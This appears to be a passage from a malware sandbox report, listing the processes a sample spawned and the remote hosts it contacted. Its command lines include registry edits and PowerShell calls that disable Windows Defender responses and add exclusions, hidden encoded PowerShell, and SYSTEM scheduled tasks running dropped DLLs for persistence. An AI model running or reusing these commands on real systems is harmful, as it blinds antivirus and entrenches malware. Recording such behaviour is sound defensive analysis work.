\"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QSBDBQxFkAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TjUkTRKCSiJkC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tEZYwqVfuQYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BhywXhhbcuWpvQvH\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QSBDBQxFkAUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TjUkTRKCSiJkC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tEZYwqVfuQYU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\IrAQtycGxHJKWAVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XYiMwitzkSXbvcQKY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BhywXhhbcuWpvQvH /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdbNRRfPn" /SC once /ST 00:07:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdbNRRfPn"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdbNRRfPn"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "hzhNAJUNSjjdIpELG" /SC once /ST 00:04:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe\" AX /ZHOydidKV 385107 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "hzhNAJUNSjjdIpELG"
C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe
C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe AX /ZHOydidKV 385107 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 936
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bOYLEOfZCACcRQIJvG"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\FDxSmxakU\NbuCkm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FnGigHNXGPuYnow" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FnGigHNXGPuYnow2" /F /xml "C:\Program Files (x86)\FDxSmxakU\aUoLPQQ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FnGigHNXGPuYnow"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FnGigHNXGPuYnow"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DfiACOcNeeEuzZ" /F /xml "C:\Program Files (x86)\tEZYwqVfuQYU2\wSfRwKR.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DXKOGWDrZMiLW2" /F /xml "C:\ProgramData\IrAQtycGxHJKWAVB\WOjutgw.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "WycbLMNWffCalOPaD2" /F /xml "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\sOPBqcf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SCruIlpVLZHSGSIWWcc2" /F /xml "C:\Program Files (x86)\TjUkTRKCSiJkC\mPdOlvG.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXgiPdpSGbihZCqEr" /SC once /ST 04:31:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\BhywXhhbcuWpvQvH\VcAdtmLG\zhcfGiH.dll\",#1 /XQdidvy 385107" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXgiPdpSGbihZCqEr"
\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\BhywXhhbcuWpvQvH\VcAdtmLG\zhcfGiH.dll",#1 /XQdidvy 385107
C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\BhywXhhbcuWpvQvH\VcAdtmLG\zhcfGiH.dll",#1 /XQdidvy 385107
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hzhNAJUNSjjdIpELG"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 940
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXgiPdpSGbihZCqEr"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.117:80 | 185.215.113.117 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.113.215.185.in-addr.arpa | udp |
| DE | 95.179.250.45:26212 | tcp | |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| US | 8.8.8.8:53 | 45.250.179.95.in-addr.arpa | udp |
| FI | 65.21.18.51:45580 | tcp | |
